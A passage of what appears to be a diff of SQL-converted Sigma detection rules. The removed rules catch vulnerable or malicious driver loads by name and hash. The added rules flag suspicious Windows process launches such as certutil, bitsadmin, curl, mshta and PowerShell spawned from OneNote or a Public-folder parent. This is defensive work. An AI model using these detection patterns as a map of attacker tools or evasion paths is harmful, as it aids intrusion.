'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', 
'4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', 
'509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 
'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', 
'9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 
'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 
'65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', 
'3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', 
'5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' 
ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed 
Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 
'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE 